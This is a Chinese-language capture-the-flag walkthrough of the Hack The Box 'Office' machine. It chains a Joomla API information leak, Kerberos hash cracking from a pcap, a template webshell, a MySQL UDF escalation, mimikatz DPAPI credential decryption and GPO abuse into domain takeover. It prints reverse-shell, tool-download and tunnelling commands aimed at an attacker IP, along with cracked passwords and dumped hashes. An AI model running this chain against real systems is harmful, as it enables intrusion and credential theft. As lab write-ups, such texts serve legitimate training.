基本信息

端口扫描

80,443,和一些常规域端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
$ nmap -sC -sV 10.10.11.3
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 13:39 CST
Nmap scan report for 10.10.11.3
Host is up (0.86s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-18 14:07:15Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn:
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m59s
| smb2-time:
|   date: 2024-02-18T14:08:09
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1740.19 seconds

80

一个介绍电影的博客:

目录扫描

目录扫描发现一些目录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://10.10.11.3/ -x php

/Images               (Status: 301) [Size: 334] [--> http://10.10.11.3/Images/]
/Media                (Status: 301) [Size: 333] [--> http://10.10.11.3/Media/]
/TMP                  (Status: 301) [Size: 331] [--> http://10.10.11.3/TMP/]
/administrator        (Status: 301) [Size: 341] [--> http://10.10.11.3/administrator/]
/api                  (Status: 301) [Size: 331] [--> http://10.10.11.3/api/]
...
/cache                (Status: 301) [Size: 333] [--> http://10.10.11.3/cache/]
/components           (Status: 301) [Size: 338] [--> http://10.10.11.3/components/]
/configuration.php    (Status: 200) [Size: 0]
/images               (Status: 301) [Size: 334] [--> http://10.10.11.3/images/]
/includes             (Status: 301) [Size: 336] [--> http://10.10.11.3/includes/]
/language             (Status: 301) [Size: 336] [--> http://10.10.11.3/language/]
/index.php            (Status: 200) [Size: 24214]
/media                (Status: 301) [Size: 333] [--> http://10.10.11.3/media/]
/modules              (Status: 301) [Size: 335] [--> http://10.10.11.3/modules/]
/plugins              (Status: 301) [Size: 335] [--> http://10.10.11.3/plugins/]
/robots.txt           (Status: 200) [Size: 764]
/templates            (Status: 301) [Size: 337] [--> http://10.10.11.3/templates/]

administrator

访问administrator可以发现是joomla :

joomla

参考:

首先确认版本:

1
2
3
http://10.10.11.3/administrator/manifests/files/joomla.xml

4.2.7

CVE-2023-23752

然后根据版本搜到相关漏洞:

实际上也不需要脚本,直接访问对应url即可,config中得到数据库密码:

1
2
3
4
5
http://10.10.11.3/api/index.php/v1/users?public=true
http://10.10.11.3/api/index.php/v1/config/application?public=true

"username":"Administrator","email":"Administrator@holography.htb"
"password":"H0lOgrams4reTakIng0Ver754!"

但这组账号密码并不能登录joomla

user enum

前面可以看到这是域环境,进行常规用户名枚举:

1
2
3
4
5
6
7
8
9
10
./kerbrute_darwin_amd64 userenum --dc 10.10.11.3 -d office.htb /Users/miao/Tools/dict/SecLists/Usernames/xato-net-10-million-usernames-dup.txt

2024/02/18 13:58:17 >  [+] VALID USERNAME:	 administrator@office.htb
2024/02/18 14:03:22 >  [+] VALID USERNAME:	 Administrator@office.htb
2024/02/18 14:05:53 >  [+] VALID USERNAME:	 ewhite@office.htb
2024/02/18 14:05:53 >  [+] VALID USERNAME:	 etower@office.htb
2024/02/18 14:05:54 >  [+] VALID USERNAME:	 dwolfe@office.htb
2024/02/18 14:05:57 >  [+] VALID USERNAME:	 dmichael@office.htb
2024/02/18 14:05:57 >  [+] VALID USERNAME:	 dlanor@office.htb
2024/02/18 15:07:14 >  [+] VALID USERNAME:	 hhogan@office.htb

SMB

使用这些用户名和已经得到的密码组合尝试,发现有效组合:

1
2
dwolfe
H0lOgrams4reTakIng0Ver754!

然后使用这组有效账号查看smb,在SOC Analysis里发现一个pcap文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
python3 ~/Tools/impacket/examples/smbclient.py dwolfe:'H0lOgrams4reTakIng0Ver754!'@10.10.11.3

# shares
ADMIN$
C$
IPC$
NETLOGON
SOC Analysis
SYSVOL
# use SOC Analysis
# ls
drw-rw-rw-          0  Thu May 11 02:52:24 2023 .
drw-rw-rw-          0  Wed Feb 14 18:18:31 2024 ..
-rw-rw-rw-    1372860  Thu May 11 02:51:42 2023 Latest-System-Dump-8fbc124d.pcap
# get Latest-System-Dump-8fbc124d.pcap

pcap

查看pcap文件,在其中可以看到存在AS-REQ请求:

那么我们就可以提取出对应的hash,离线破解:

1
2
3
4
5
6
7
8
9
10
11
tshark -r ./Latest-System-Dump-8fbc124d.pcap -Y "kerberos.msg_type == 10 && kerberos.cipher && kerberos.realm && kerberos.CNameString" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher -E separator=$

tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

# 处理下格式
$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

# 破解出密码
sudo hashcat -m 19900 hash.txt ~/Tools/dict/rockyou.txt

playboy69

joomla again

回到joomla,joomla网页上Administrator密码就是前一步得到的tshark密码:

shell

然后就是常规的joomla后台getshell,修改模板,访问执行:

1
http://10.10.11.3/templates/cassiopeia/error.php?cmd=whoami

上msf方便后续操作:

1
2
3
4
5
http://10.10.11.3/templates/cassiopeia/error.php?cmd=powershell.exe -nop -w hidden -e xxxx

meterpreter > execute -f notepad.exe
Process 105488 created.
meterpreter > migrate 105488

得到的是web_account

非预期 root

因为前面已经拿到了数据库密码,所以直接打udf:

1
2
3
4
5
6
7
8
9
10
11
12
# 先通过joomla得到的shell创建对应目录
C:\xampp\mysql>mkdir lib
C:\xampp\mysql>cd lib
C:\xampp\mysql\lib>mkdir plugin

use exploit/multi/mysql/mysql_udf_payload
# 添加路由,以便访问本地的mysql
msf6 exploit(multi/mysql/mysql_udf_payload) > route add 127.0.0.1 255.255.255.0 1
msf6 exploit(multi/mysql/mysql_udf_payload) > set rhosts 127.0.0.1
msf6 exploit(multi/mysql/mysql_udf_payload) > set PASSWORD H0lOgrams4reTakIng0Ver754!
# 其他选项就正常设置
msf6 exploit(multi/mysql/mysql_udf_payload) > exploit

这里得到的也是web_account,但和第一个相比多了SeImpersonatePrivilege权限,所以可以一键system(还是要手动指定技术编号):

1
meterpreter > getsystem -t 6

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f5b4f1e96c7ffca801ed5832e5e9105d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bdf51241ff49f8a2169bba26be8494ed:::
PPotts:1107:aad3b435b51404eeaad3b435b51404ee:b33adc3d2cc514aa321eec4366e6e778:::
HHogan:1108:aad3b435b51404eeaad3b435b51404ee:6a626de046afdb1ece5118d54649b347:::
EWhite:1109:aad3b435b51404eeaad3b435b51404ee:385b9b3fde7b0043a57628581d0ca79b:::
etower:1110:aad3b435b51404eeaad3b435b51404ee:b0281fa65adf3d6efbefde882d592379:::
dwolfe:1111:aad3b435b51404eeaad3b435b51404ee:04e1dc0b00ea7c7c4246eb9f46fa29dd:::
dmichael:1112:aad3b435b51404eeaad3b435b51404ee:5ddea8fee3355c5492d4c2a07c73f7d3:::
dlanor:1113:aad3b435b51404eeaad3b435b51404ee:8a3594633f2175cf1b74776d1ef0c7a8:::
tstark:1114:aad3b435b51404eeaad3b435b51404ee:89ff936c3824c0ece9003332532e6a23:::
web_account:1118:aad3b435b51404eeaad3b435b51404ee:4bd10b00cf88e55d444099f25ea8de25:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:0ddf0e8e5b48cf2085a16e86c1a3bf49:::

预期 user flag

预期方法从joomla得到的web_account继续,前面已经得到了tshark账号密码,切过去桌面得到user flag

1
2
3
powershell -exec bypass -c "wget http://10.10.16.4:7777/RunasCs.exe" -o RunasCs.exe

RunasCs.exe tstark playboy69 cmd.exe -r 10.10.16.4:4446 -d office.htb

internal

查看目录发现还有个internal站点:

查看端口或者配置文件发现本地8083:

1
2
C:\>netstat -anop tcp
  TCP    0.0.0.0:8083           0.0.0.0:0              LISTENING       5032

转发出来访问:

1
2
3
4
5
6
powershell -exec bypass -c "wget http://10.10.16.4:7777/chisel.exe" -o chisel.exe

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse
# target
chisel.exe client 10.10.16.4:9999 R:8083:127.0.0.1:8083

是一个内部系统

并且可以上传简历:

libreoffice

查看session可以看到ppotts,并且可以看到安装了libreoffice,结合前面简历上传,应该就是模拟了ppotts自动查看简历:

所以就是做一个带宏的简历上传(Gofer也用到了这个):

1
2
# 上传后存放路径
C:\xampp\htdocs\internal\applications

这样打到ppotts

hhogan

这里是作者给的提示,查看cmdkey发现有hhogan的信息:

1
2
3
4
5
6
7
8
9
10
11
12
C:\Program Files\LibreOffice 5\program>cmdkey /list
cmdkey /list

Currently stored credentials:

    Target: LegacyGeneric:target=MyTarget
    Type: Generic
    User: MyUser

    Target: Domain:interactive=OFFICE\hhogan
    Type: Domain Password
    User: OFFICE\hhogan

但因为是不同用户,不能直接使用,需要解密出来数据:

dpapi

windows的凭据管理器就是dpapi,最终得到HHogan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
powershell -exec bypass -c "wget http://10.10.16.7:7777/mimikatz_2.2.0.exe -o C:\temp\mimikatz_2.2.0.exe"

mimikatz # vault::cred
mimikatz # vault::list

echo %appdata%
C:\Users\PPotts\AppData\Roaming

dir /a:h C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
# 这里比较坑,有三个,23年的才是包含数据的,最后一个24年的是空的
05/09/2023  01:08 PM               358 18A1927A997A794B65E9849883AC3F3E
05/09/2023  03:03 PM               398 84F1CAEEBF466550F4967858F9353FB4
01/18/2024  11:53 AM               374 E76CCA3670CD9BB98DF79E0A8D176F1E


mimikatz # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4
guidMasterKey      : {191d3f9d-7959-4b4d-a520-a444853c47eb}

wmic useraccount get name,sid
PPotts         S-1-5-21-1199398058-4196589450-691661856-1107


mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc
mimikatz # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4

UserName       : OFFICE\HHogan
CredentialBlob : H4ppyFtW183#
  
run post/windows/manage/run_as_psh user=HHogan pass=H4ppyFtW183# domainn=office.htb

GPO Abuse & root flag

HHogan在GPO Managers组中,很明显,滥用gpo,结合bloodhound也可以确认:

1
2
3
4
5
6
7
evil-winrm -i 10.10.11.3 -u HHogan -p 'H4ppyFtW183#'

upload SharpGPOAbuse.exe

.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author office\Administrator --Command "cmd.exe" --Arguments "/c C:\temp\miao.exe" --GPOName "DEFAULT DOMAIN CONTROLLERS POLICY" 
# 刷新组策略,触发执行
gpupdate /force

打到system

root flag

Administrator 桌面:

参考资料